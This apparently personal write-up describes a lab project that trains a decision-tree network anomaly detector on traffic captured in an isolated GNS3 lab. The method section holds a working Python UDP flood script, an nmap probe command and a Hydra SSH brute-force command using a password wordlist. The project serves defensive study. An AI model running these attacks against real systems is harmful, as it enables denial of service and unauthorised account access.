Basic Machine Learning : Network Anomaly Detection
Disclaimer: This note was written by me (Mayank Nauni) in my personal capacity. The opinions expressed in this article are solely my own and do not reflect the views of my employer or any preference of mine towards any of the OEMs.
Special thanks to Kenny Ong, my friend and course-mate at Singapore University of Technology and Design, for collaborating with me on this mini-project, and to Tao Liu for his excellent blog on the same subject: https://www.linkedin.com/pulse/build-machine-learning-model-network-flow-tao-liu/
Network attacks have grown in number as Internet technologies continue to advance and improve our lives, and in recent years network intrusion detection has become a significant research topic in the industry.
The term network anomaly detection refers to the identification of rare and unexpected bursts of activity within a computer network. A network anomaly, in this context, is a deliberate intrusion attempt to (i) access information, (ii) manipulate information, or (iii) render a computer system or network unreliable or unusable.
To set up anomaly detection properly in this project, the concept of normality first needs to be grasped: the captured traffic has to be defined as either normal or anomalous. Tools that help create datasets allow us to produce more findings in the area of network intrusion detection methods and systems (NIDS).
The network topology is set up using GNS3 Emulator as a tool to simulate the network anomaly detection system. The following are the devices and virtual machines (VM).
- Switch (Gateway) Based on Cisco IOS image (12.4) – 10.0.2.1
- Kali Attacker VM – 2021.2 release – 10.0.2.15
- Metasploitable-2 VM – 10.0.2.2
- SIEM VM – 10.0.2.30
GitHub Repo: https://github.com/mayanknauni/ML_Cybersecurity
The topology was created on the GNS3 network emulator, which uses a real IOS image (version 12.4) for the Cisco switch. The Kali VM (2021.2 release) and the Metasploitable VM were created on VirtualBox, which is integrated with GNS3, and the VMs are connected to the switch using a generic driver (UDP tunnel).
On the switch, we created a SPAN session to capture all traffic on the network port connected to the Metasploitable VM and redirect it to the SIEM VM. We use “tshark” on the SIEM VM to convert the captured “.pcap” files to “.csv” files.
Below is the GNS3 topology that we created and used for this project. The SIEM was an additional VM used to sniff the data during the attacks, to see how the attacks are perceived by SIEM software.
We set out to build a machine learning model for Wireshark packet-flow classification, following the process below:
The ML model is prepared according to the strategy below:
Our strategy is to execute four attacks, elaborated in the method section, and manually capture the packets for each of them on the Metasploitable server end. Each capture is labelled accordingly, and all four captures are later aggregated, together with the benign network capture, to form a dataset.
The dataset is then sanitized with a Python script, which checks the dataset for NaN values and replaces empty cells with 0.
We also replaced the IP address and TCP flags values with integers so that our algorithm could run properly.
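The two integer conversions mentioned above can be illustrated with a minimal sketch using only the Python standard library. The helper names `ip_to_int` and `flags_to_int` are hypothetical and chosen for this illustration; the sample values are made up, with the IP taken from the Kali VM in the topology.

```python
import ipaddress


def ip_to_int(address):
    """Convert a dotted-quad IPv4 string to its 32-bit integer value."""
    return int(ipaddress.IPv4Address(address))


def flags_to_int(flags):
    """Convert a hexadecimal TCP flags string such as '0x0012' to an integer."""
    return int(str(flags), 16)


print(ip_to_int("10.0.2.15"))   # 167772687
print(flags_to_int("0x0012"))   # 18 (SYN and ACK bits set)
```

Both conversions keep the information in the original field while giving the classifier a purely numeric input.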
Creating the datasets involves capturing the normal, benign communication between the clients and servers, generated through Python scripts, with all traffic collected using Wireshark as the packet capture tool.
The four kinds of attacks implemented and run from the malicious client are as follows:
- DDoS
- Probe
- Brute force
- SQL
From these attacks, benign and malicious traffic is merged and labeled for classification and further analysis via Weka.
The attacks were carried out at the timestamps below:
|Start Time||End Time||Exploit||Remark|
|8:05 pm||8:15 pm||Benign||Usual web access simulated with watch at a 5-second interval: watch -n 5 "curl http://10.0.2.2"|
|8:16 pm||8:20 pm||DDoS||ddos.py|
|9:00 pm||9:06 pm||Probe||nmap|
|9:15 pm||9:20 pm||Brute force||Hydra|
|9:30 pm||9:37 pm||SQL||Metasploitable|
We simulated usual web access by running watch at a 5-second interval and captured the packets:
Command: watch -n 5 "curl http://10.0.2.2"
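We used the Python 2 code below to simulate a DDoS attack on Metasploitable2 inside the isolated lab network:
import os
import random
import socket
from datetime import datetime

# Timestamp components (kept from the original script; not used below)
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year

# UDP socket and a random 1490-byte payload
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
os.system("figlet DDos Attack")
ip = raw_input("IP Target : ")
port = input("Port : ")
os.system("figlet Attack Starting")
sent = 0
# Send one datagram per port, cycling through the port range until interrupted
while True:
    sock.sendto(bytes, (ip, port))
    sent = sent + 1
    port = port + 1
    print "Sent %s packet to %s through port:%s" % (sent, ip, port)
    if port == 65534:
        port = 1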
Command: python2 ddos.py
The attack runs endlessly until we interrupt the script.
We used nmap to run a probe against Metasploitable2:
Command: nmap -sC -sV -oA project 10.0.2.2
The packets were captured from the time the scan started until it completed successfully.
We used Hydra to launch a brute-force attack with SSH login attempts on port 22:
Command: sudo hydra -V -f -t 4 -l msfadmin -P /usr/share/wordlists/rockyou.txt ssh://10.0.2.2
Command: tshark -r http.pcap -T fields -E header=y -E separator=, -E quote=d -E occurrence=f -e ip.src -e ip.dst -e ip.len -e ip.flags.df -e ip.flags.mf -e ip.fragment -e ip.fragment.count -e ip.fragments -e ip.ttl -e ip.proto -e tcp.window_size -e tcp.ack -e tcp.seq -e tcp.len -e tcp.stream -e tcp.urgent_pointer -e tcp.flags -e tcp.analysis.ack_rtt -e tcp.segments -e tcp.reassembled.length -e http.request -e udp.port -e frame.time_relative -e frame.time_delta -e tcp.time_relative -e tcp.time_delta > benign.csv
We selected the 26 features below from the Wireshark capture:
|ip.src||Source Address||IPv4 address|
|ip.dst||Destination Address||IPv4 address|
|ip.len||Total Length||Unsigned integer, 2 bytes|
|ip.fragment||IPv4 Fragment||Frame number|
|ip.fragment.count||Fragment count||Unsigned integer, 4 bytes|
|ip.fragments||IPv4 Fragments||Sequence of bytes|
|ip.ttl||Time to Live||Unsigned integer, 1 byte|
|ip.proto||Protocol||Unsigned integer, 1 byte|
|tcp.window_size||Calculated window size||Unsigned integer, 4 bytes|
|tcp.ack||Acknowledgment Number||Unsigned integer, 4 bytes|
|tcp.seq||Sequence Number||Unsigned integer, 4 bytes|
|tcp.len||TCP Segment Len||Unsigned integer, 4 bytes|
|tcp.stream||Stream index||Unsigned integer, 4 bytes|
|tcp.urgent_pointer||Urgent Pointer||Unsigned integer, 2 bytes|
|tcp.flags||Flags||Unsigned integer, 2 bytes|
|tcp.analysis.ack_rtt||The RTT to ACK the segment was||Time offset|
|tcp.segments||Reassembled TCP Segments||Label|
|tcp.reassembled.length||Reassembled TCP length||Unsigned integer, 4 bytes|
|udp.port||Source or Destination Port||Unsigned integer, 2 bytes|
|frame.time_relative||Time since reference or first frame||Time offset|
|frame.time_delta||Time delta from previous captured frame||Time offset|
|tcp.time_relative||Time since first frame in this TCP stream||Time offset|
|tcp.time_delta||Time since previous frame in this TCP stream||Time offset|
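Because the same 26-field extraction has to be repeated for every capture, it can help to generate the tshark argument list from a single field list. The following is a minimal sketch, not the authors' tooling: the function name `build_tshark_command` is hypothetical, while the flags and field names are copied from the command shown earlier.

```python
# Fields in the same order as the tshark command used for the benign capture
FIELDS = [
    "ip.src", "ip.dst", "ip.len", "ip.flags.df", "ip.flags.mf",
    "ip.fragment", "ip.fragment.count", "ip.fragments", "ip.ttl", "ip.proto",
    "tcp.window_size", "tcp.ack", "tcp.seq", "tcp.len", "tcp.stream",
    "tcp.urgent_pointer", "tcp.flags", "tcp.analysis.ack_rtt", "tcp.segments",
    "tcp.reassembled.length", "http.request", "udp.port",
    "frame.time_relative", "frame.time_delta",
    "tcp.time_relative", "tcp.time_delta",
]


def build_tshark_command(pcap_path, fields=FIELDS):
    """Return the tshark argument list that exports `fields` as quoted CSV."""
    cmd = ["tshark", "-r", pcap_path, "-T", "fields",
           "-E", "header=y", "-E", "separator=,",
           "-E", "quote=d", "-E", "occurrence=f"]
    for field in fields:
        cmd += ["-e", field]
    return cmd


cmd = build_tshark_command("http.pcap")
print(" ".join(cmd))
```

The returned list can be passed to `subprocess.run` with standard output redirected to the target csv file, which avoids retyping the field list for each of the five captures.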
Command: python3 step1_cleanup.py benign.csv
The script below cleans up the supplied csv file, benign.csv in this case: all null values are filled in with 0, and non-integer fields such as tcp.flags, ip.dst and ip.src are converted into integers.
import sys
import ipaddress
import pandas as pd

# The csv file to clean is passed as the first command-line argument
filename = sys.argv[1]
file1 = pd.read_csv(filename)
# step-1: replace all null values with 0
update_file = file1.fillna(0)
# step-2: convert tcp.flags (hexadecimal string), ip.dst and ip.src to integers
update_file['tcp.flags'] = update_file['tcp.flags'].apply(lambda x: int(str(x), 16))
update_file['ip.dst'] = update_file['ip.dst'].apply(lambda x: int(ipaddress.IPv4Address(x)))
update_file['ip.src'] = update_file['ip.src'].apply(lambda x: int(ipaddress.IPv4Address(x)))
# step-3: write the cleaned data to a new file with the prefix "updated_"
update_file.to_csv('updated_' + filename, index=False)
The command above generated a new file with the cleaned-up data, “updated_benign.csv”.
We use another Python script to add a column named “label” to the file “updated_benign.csv”, specifying the label with the command below:
Command: python2 step2_labelling.py benign updated_benign.csv
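import csv
import sys

# Usage: python2 step2_labelling.py <label> <csv file>
label = sys.argv[1]
file_name = sys.argv[2]
file = open(file_name)
content = csv.reader(file)
# Extend the header row with the new "label" column
row0 = content.next()
row0.append('label')
all = [row0]
# Append the label to every data row
for item in content:
    item.append(label)
    all.append(item)
new_file = open(label + '_' + file_name, 'w')
writer = csv.writer(new_file, lineterminator='\n')
writer.writerows(all)
new_file.close()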
This creates a new file named benign_updated_benign.csv, where the leading “benign” is the label we passed to the Python script.
This step is repeated for all four attacks, yielding four additional csv files.
We aggregate the above five files into a common dataset called “master_dataset.csv”, which we then analyze in Weka.
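The aggregation step can be sketched as a plain concatenation of csv files that share the same header. This is a minimal illustration under that assumption, not the authors' script; the function name `aggregate_csv` is hypothetical.

```python
import csv


def aggregate_csv(paths, out_path):
    """Concatenate csv files with identical headers; return the data-row count."""
    header = None
    rows_written = 0
    with open(out_path, "w", newline="") as out_file:
        writer = csv.writer(out_file, lineterminator="\n")
        for path in paths:
            with open(path, newline="") as in_file:
                reader = csv.reader(in_file)
                file_header = next(reader)
                if header is None:
                    # Write the header once, taken from the first file
                    header = file_header
                    writer.writerow(header)
                elif file_header != header:
                    raise ValueError("header mismatch in " + path)
                for row in reader:
                    writer.writerow(row)
                    rows_written += 1
    return rows_written
```

It would be called with the five labelled files, for example `aggregate_csv(["benign_updated_benign.csv", ...], "master_dataset.csv")`, where the remaining file names depend on the labels chosen for each attack capture.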
We opened “master_dataset.csv” in Weka for analysis; a glimpse of the label attribute is below:
We ran ReliefFAttributeEval, which yielded the results below:
The top 15 attributes out of 26 are ranked below:
Correctly Classified Instances 16204 98.4088 %
Incorrectly Classified Instances 262 1.5912 %
Correctly Classified Instances 16148 98.0687 %
Incorrectly Classified Instances 318 1.9313 %
Correctly Classified Instances 15815 96.0464 %
Incorrectly Classified Instances 651 3.9536 %
Correctly Classified Instances 15216 92.4086 %
Incorrectly Classified Instances 1250 7.5914 %
Based on the outputs above, the J48 decision tree model gave us the best accuracy, so we proceeded to build a detection tool around it.
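The percentages in the Weka summaries follow directly from the instance counts: accuracy is the number of correctly classified instances divided by the total. A short check of the four reported pairs (the helper name `accuracy_percent` is only for illustration):

```python
def accuracy_percent(correct, incorrect):
    """Accuracy as a percentage of all classified instances."""
    return 100.0 * correct / (correct + incorrect)


# (correct, incorrect) pairs as reported in the Weka summaries
runs = [(16204, 262), (16148, 318), (15815, 651), (15216, 1250)]
for correct, incorrect in runs:
    total = correct + incorrect
    print(total, round(accuracy_percent(correct, incorrect), 4))
```

Every run covers the same 16466 instances, so the accuracies are directly comparable.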
We used the following to build our offline detection tool:
- Python: 3.8.5 (default, Jan 27 2021, 15:41:15) [GCC 9.3.0]
- scipy: 1.6.0
- numpy: 1.19.5
- matplotlib: 3.4.3
- pandas: 1.3.1
- sklearn: 0.24.2
We split our data into three datasets: one for training, another for validation, and the last one for testing. After running this program on the default dataset “master_dataset.csv”, we get the output below:
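A three-way split of this kind can be sketched with two calls to scikit-learn's `train_test_split`. The 60/20/20 proportions, the random seed and the synthetic data are assumptions for illustration; the article does not state the ratios used in step3_train.py.

```python
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split

# Synthetic stand-in for the feature matrix and labels of master_dataset.csv
X, y = make_classification(n_samples=100, n_features=8, random_state=0)

# First hold out 20% of the data as the final test set
X_rest, X_test, y_rest, y_test = train_test_split(
    X, y, test_size=0.2, random_state=0, stratify=y)

# Then split the remainder 75/25 into training and validation sets
X_train, X_val, y_train, y_val = train_test_split(
    X_rest, y_rest, test_size=0.25, random_state=0, stratify=y_rest)

print(len(X_train), len(X_val), len(X_test))  # 60 20 20
```

Stratifying on the label keeps the class proportions similar in all three parts, which matters when some attack classes have far fewer packets than others.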
We compared the accuracy of the models below:
- ‘LR’ : Logistic Regression
- ‘LDA’: Linear Discriminant Analysis
- ‘KNN’: KNeighbors Classifier
- ‘CART’: Decision Tree Classifier
Command: python3 step3_train.py
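A comparison of these four classifiers can be sketched with cross-validation in scikit-learn. This is an illustrative sketch rather than the contents of step3_train.py: the synthetic dataset, the 10-fold setting and the random seeds are assumptions.

```python
from sklearn.datasets import make_classification
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import StratifiedKFold, cross_val_score
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier

# Synthetic multi-class data standing in for the training portion of the dataset
X, y = make_classification(n_samples=300, n_features=10, n_informative=5,
                           n_classes=3, random_state=7)

models = {
    "LR": LogisticRegression(max_iter=1000),
    "LDA": LinearDiscriminantAnalysis(),
    "KNN": KNeighborsClassifier(),
    "CART": DecisionTreeClassifier(random_state=7),
}

# Evaluate every model on the same stratified folds so the scores are comparable
kfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=7)
results = {}
for name, model in models.items():
    scores = cross_val_score(model, X, y, cv=kfold, scoring="accuracy")
    results[name] = scores.mean()
    print("%s: %.4f (+/- %.4f)" % (name, scores.mean(), scores.std()))
```

On the real dataset, the model with the highest mean accuracy would then be refit on the training data and checked once against the held-out test set.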
We are using CART (Decision Tree), which is a white-box type of ML algorithm. The time complexity of decision trees is a function of the number of records and the number of attributes in the given data. Decision trees can handle high-dimensional data with good accuracy.
As seen from the output below, CART was reported to have the maximum accuracy in the first comparison, i.e. 98.21%, which is very close to the 98.40% accuracy we observed in Weka.
The accuracy of the final testing dataset was 98.31%.
We saved our model using the joblib library as “finalized_DT_model.sav”.
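Saving and reloading a fitted decision tree with joblib can be sketched as follows. The synthetic training data and the temporary directory are assumptions for illustration; only the file name comes from the article.

```python
import os
import tempfile

import joblib
from sklearn.datasets import make_classification
from sklearn.tree import DecisionTreeClassifier

# Fit a small decision tree on synthetic data (stand-in for the real dataset)
X, y = make_classification(n_samples=200, n_features=8, random_state=1)
model = DecisionTreeClassifier(random_state=1).fit(X, y)

# Persist the fitted model, then load it back as a separate object
model_path = os.path.join(tempfile.mkdtemp(), "finalized_DT_model.sav")
joblib.dump(model, model_path)
loaded = joblib.load(model_path)

# The reloaded model should reproduce the original predictions exactly
same = bool((loaded.predict(X) == model.predict(X)).all())
print(same)
```

A saved model should be loaded with the same scikit-learn version that produced it, since the serialized format is not guaranteed to be compatible across releases.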
We initiated a fresh probe, captured the data, converted it to csv, labelled it as “unknown” and appended it to master_dataset.csv. We then ran the same model again and checked the confusion matrix: as seen below, all counts for the new capture fall into the fourth column, which is probe itself.
We also ran the amended master_dataset.csv through the Weka J48 model to confirm our results. As expected, it gave similar results in the confusion matrix, which confirms that the prediction works as expected:
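How such a confusion matrix is read can be shown with a toy example in scikit-learn. The label names and counts below are made up for illustration (the article's exact label strings are not shown); rows are the actual labels and columns are the predicted labels, in alphabetical order.

```python
from sklearn.metrics import confusion_matrix

# Hypothetical label set; alphabetical order puts "probe" in the fourth column
labels = ["benign", "bruteforce", "ddos", "probe", "sql", "unknown"]

# Five fresh packets labelled "unknown" that the model predicts as "probe",
# plus three benign packets predicted correctly
y_true = ["unknown"] * 5 + ["benign"] * 3
y_pred = ["probe"] * 5 + ["benign"] * 3

cm = confusion_matrix(y_true, y_pred, labels=labels)
print(cm)
```

In the printed matrix, the "unknown" row has all five of its counts in the fourth column, which is the pattern described above for the fresh probe capture.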
We successfully produced a working detection model using a decision tree algorithm with an accuracy of 98.4%. The results of the tool coincided with the results produced by Weka, which indicates that the tool we created and the model we deployed produce legitimate results.
We first tried “CICFlowmeter” for feature extraction. It took us days just to get it running, as the majority of its dependencies are very old, and even once it was up and running it gave erroneous outputs for the same data across multiple iterations. For example, for a flow of 2200 packets it generated output for only 101 packets, which made us switch to tshark instead.
We tried different ways of attacking the Metasploitable VM, but given the limited resources of our laptop the VMs crashed frequently, so we had to select attack methodologies that are not resource-intensive.
We have concluded that while our model’s accuracy is very high at 98.4%, this is because the dataset we used is small, which introduced some bias. If we had to do this for a production environment with more infrastructure resources available, we would run the captures for days.
We have provided the files below as part of the submission.
|1||step1_cleanup.py||For csv cleanup: python3 step1_cleanup.py filename.csv|
|2||step2_labelling.py||For labelling the csv: python2 step2_labelling.py benign updated_benign.csv|
|3||step3_train.py||For training and prediction (refers to static file master_dataset.csv)|
|Raw Attack Wireshark Captures|
|Individual attack CSV files|
|7||finalized_DT_model.sav||Saved ML Model|
|8||ddos.py||For DDoS simulation|